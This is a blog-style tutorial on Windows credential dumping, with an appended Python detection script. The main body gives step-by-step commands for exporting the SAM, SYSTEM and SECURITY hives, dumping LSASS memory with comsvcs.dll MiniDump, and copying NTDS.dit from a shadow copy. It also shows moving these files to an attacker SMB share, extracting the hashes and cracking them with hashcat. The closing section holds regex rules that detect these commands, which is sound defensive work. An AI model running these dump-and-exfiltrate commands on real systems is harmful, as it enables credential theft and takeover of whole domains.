The ultimate guide to Windows Local Password Attacks – Part 1

Windows Password Attacks Overview

Windows password attacks focus on extracting and cracking stored credentials to gain unauthorized access to systems and networks. Attackers often target the Security Accounts Manager (SAM) database, the LSASS process and the NTDS.dit file. These components store critical data such as hashed passwords, cached credentials and domain account information. By dumping these files and transferring them to an attacker-controlled machine, the passwords can be cracked offline, bypassing online security controls. Such attacks can lead to the compromise of both local and domain accounts, potentially giving attackers full control over a system or network.

1) Attacking SAM:

The first portion of Windows password attacks involves the SAM. The Security Accounts Manager (SAM) in Windows is a crucial component that stores hashed passwords for local user accounts on a non-domain-joined system. During local password attacks, gaining access to the SAM database is a primary target, as it allows attackers to retrieve these hashed passwords. Once the SAM database files are dumped from a compromised system, they can be transferred to an attack host for offline cracking. This enables attackers to bypass online restrictions and systematically attempt to crack the password hashes, potentially gaining access to sensitive accounts on the targeted machine.

With access to a non-domain joined Windows system, we may benefit from attempting to quickly dump the files associated with the SAM database to transfer them to our attack host and start cracking hashes offline.

The following steps can be used to do this:

1) Copying SAM Registry Hives:

There are three registry hives that we can copy if we have local admin access on the target.

Registry Hive    Description
hklm\sam         Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system      Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.
hklm\security    Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.


Using reg.exe save to Copy Registry Hives:

Run cmd.exe as administrator:

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Now we can transfer these files to our attack host using smbserver.py or another file transfer method (shown at the end of this section).

2) Dumping Hashes with secretsdump.py:

Using secretsdump.py is a simple process. All we must do is run secretsdump.py using Python, then specify each hive file we retrieved from the target host.

secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
3) Cracking Hashes with Hashcat:

hashcat -m 1000 hashestocrack.txt /opt/useful/SeclLists/Passwords/Leaked-Databases/rockyou.txt

To transfer the saved hive files to the Linux attack host, we can use:

On the Linux attack host, run:

smbserver.py -smb2support CompData /home/ltnbob/Documents/

On the Windows target, run:

move sam.save \\10.10.15.16\CompData
move security.save \\10.10.15.16\CompData
move system.save \\10.10.15.16\CompData

Remote Dumping & LSA Secrets Considerations

Attacking LSASS

The second portion of Windows password attacks involves LSASS. The Local Security Authority Subsystem Service (LSASS) is a critical process in Windows operating systems responsible for enforcing security policies and managing user authentication. It handles tasks such as verifying users during login, generating access tokens and storing sensitive security information, including user credentials, in memory. Due to its vital role in managing authentication data, LSASS is a prime target in Windows password attacks.

Similar to the process of attacking the SAM database, with LSASS, it would be wise for us first to create a copy of the contents of LSASS process memory via the generation of a memory dump. Creating a dump file lets us extract credentials offline using our attack host.

Dumping LSASS Process Memory:

1) Task Manager Method:

A file called lsass.DMP is created and saved in:

C:\Users\<logged-on user>\AppData\Local\Temp

This is the file we will transfer to our attack host. We can use the file transfer method discussed in the Attacking SAM section of this module to transfer the dump file to our attack host.

2) Rundll32.exe & Comsvcs.dll Method:

Find the PID for LSASS:

In cmd:

tasklist /svc

In PowerShell:

Get-Process lsass

Creating lsass.dmp using PowerShell:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full

Now, transfer the dump file to the attack host, extract the hashes from it and crack them.

Using Pypykatz to Extract Credentials from dumps:

pypykatz: https://github.com/skelsec/pypykatz

pypykatz lsa minidump /home/peter/Documents/lsass.dmp

Cracking the NT Hash with Hashcat:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt

Attacking Active Directory & NTDS.dit

Capturing NTDS.dit

The third portion of Windows password attacks involves NTDS. NT Directory Services (NTDS) is the directory service used with AD to find and organize network resources. NTDS.dit is the primary database file associated with AD and stores all domain usernames, password hashes and other critical schema information. If this file can be captured, we could potentially compromise every account on the domain, similar to the technique covered in this module's Attacking SAM section.

Method 1

Step 1) Connecting to a DC with Evil-WinRM

evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Step 2) Checking Local Group Membership and Checking User Account Privileges including Domain

net localgroup        (should list *Administrators)
net user bwilliamson  (should list *Domain Admins)

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) rights, or equivalent.

Step 3) Creating a Shadow Copy of C:

vssadmin CREATE SHADOW /For=C:

Step 4) Copying NTDS.dit from the VSS

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

Step 5) Create an SMB share on the attack host to receive the file (smbserver.py, as in the Attacking SAM section)

Step 6) Transferring NTDS.dit to the Attack Host

cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData

Cracking Hashes & Gaining Credentials:

Using Hashcat:

sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt

If we are not able to crack the hashes, we can use a pass-the-hash attack to perform lateral movement and other activities.
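The detection-side counterpart, added here and not part of the original post: each of the three dump techniques above (reg.exe save of the SAM/SYSTEM/SECURITY hives, rundll32 loading comsvcs.dll with MiniDump, vssadmin creating a shadow copy and NTDS.dit being copied out of it) leaves a distinctive process command line, visible in Security event 4688 or Sysmon event 1 when command-line auditing is enabled. The rules and the sample events are constructed for illustration and mirror the commands shown on this page; they are not a vendor ruleset.

```python
import re

# Constructed detection rules keyed to the command lines shown on this page
RULES = [
    ("SAM/SYSTEM/SECURITY hive export via reg.exe",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("LSASS minidump via comsvcs.dll MiniDump",
     re.compile(r"\brundll32(\.exe)?\b.*comsvcs\.dll\s*,\s*MiniDump\b", re.I)),
    ("Volume shadow copy creation (NTDS.dit staging)",
     re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("NTDS.dit copied out of a shadow copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)),
]

def classify(cmdline: str):
    """Return the technique name matched by a process command line, or None."""
    for name, pattern in RULES:
        if pattern.search(cmdline):
            return name
    return None

def scan(events):
    """events: iterable of (host, command_line) pairs, e.g. the NewProcessName/CommandLine
    fields of Security event 4688 or Sysmon event 1. Returns (host, cmdline, technique) hits."""
    hits = []
    for host, cmd in events:
        technique = classify(cmd)
        if technique:
            hits.append((host, cmd, technique))
    return hits

# Constructed sample events (hostnames and PID are made up)
SAMPLE_EVENTS = [
    ("ws01", r"reg.exe save hklm\sam C:\sam.save"),
    ("ws01", r"reg.exe query hklm\software\Microsoft\Windows\CurrentVersion"),
    ("ws02", r"rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full"),
    ("dc01", r"vssadmin CREATE SHADOW /For=C:"),
    ("dc01", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"),
    ("dc01", r"vssadmin list shadows"),
]

if __name__ == "__main__":
    for host, cmd, technique in scan(SAMPLE_EVENTS):
        print(f"[ALERT] {host}: {technique}: {cmd}")
```

Command-line matching on its own is brittle; pair it with Sysmon event 10 (handles opened on lsass.exe) and alerting on shadow copy creation on domain controllers, where it is rarely legitimate outside backup windows.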


Conclusion:

Windows password attacks are a critical aspect of cybersecurity, focusing on extracting and cracking passwords stored on Windows systems. Attackers target key components such as the Security Accounts Manager (SAM), the LSASS process and the NTDS.dit file, each of which stores important credential data. By successfully dumping these files, attackers can transfer them to an external host for offline cracking. This process allows them to bypass online defenses and systematically attempt to break the passwords, leading to unauthorized access to both local and domain accounts. Mastery of Windows password attacks can result in full system or network compromise, underscoring the need for robust security measures to protect against such threats.


Our LinkedIn: https://www.linkedin.com/company/aspiainfotech/mycompany/
